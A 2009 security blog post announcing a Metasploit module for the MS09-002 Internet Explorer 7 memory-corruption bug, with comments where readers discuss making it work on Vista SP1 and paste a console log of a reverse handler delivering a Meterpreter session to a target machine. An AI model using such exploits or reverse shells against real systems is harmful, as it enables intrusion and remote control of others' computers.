Friday, February 20, 2009

MS09_002 Memory Corruption Update


CG just pushed the code to the Metasploit trunk so go run 'svn update' and enjoy. Any feedback would be good. I'll writeup a little something on it and how the vuln is triggered too when I get a chance.

dean de beer

9 comments:

Anonymous said...

Thanks for the heads up !

Wondering, is this exploit only possible on a SP0 version of Vista, or it could work on a SP1 too ? (Considering the ie7 fix hasn't been applied yet...)

dean de beer said...

I did not have a Vista SP1 image to test it on but try it. The ret used (0x0C..) should be the same. Does sp1 enable opt-out mode for DEP by default? That would include IE7 then I think and that will break the sploit.

Let me know how it goes.

Anonymous said...

Building up the Vista sp1 image as we speak. I'll get back to you asap.

Anonymous said...

Building up the Vista sp1 image as we speak. I'll get back to you asap.

Hmmm... just tried it, does not seem to work on a test computer running SP1... doing further testing as I don't know if it has the ie7 fix installed.

Anonymous said...

oddly, mine and the commited module look the same?

With some slight modifications to the heap code, exploitation on IE7/Vista SP1
is possible.

msf exploit(ms09_002_deleteobject) > rexploit
[*] Exploit running as background job.
msf exploit(ms09_002_deleteobject) >
[*] Handler binding to LHOST 172.10.1.103
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/vistasp1
[*] Local IP: http://172.10.1.103:8080/vistasp1
[*] Server started.
[*] Target is Windows Vista
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Overflow to 172.10.1.105:49277...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.10.1.103:65535 -> 172.10.1.105:49278)

msf exploit(ms09_002_deleteobject) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: DA-RIZZLE
OS : Windows 2000 (Build 6001, Service Pack 1).
meterpreter >

CG said...

well overwrite that shizzle with the SP1 version, i'm sure everyone wont mind :-)

Anonymous said...

Oh yeah, that would be nice, being able to play with sp1 too ! Please update the exploit to support SP1 !

Anonymous said...

msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[-] Exploit failed: Permission denied - bind(2)

where's the prob? help!

Anonymous said...

solved my own prob, thanks!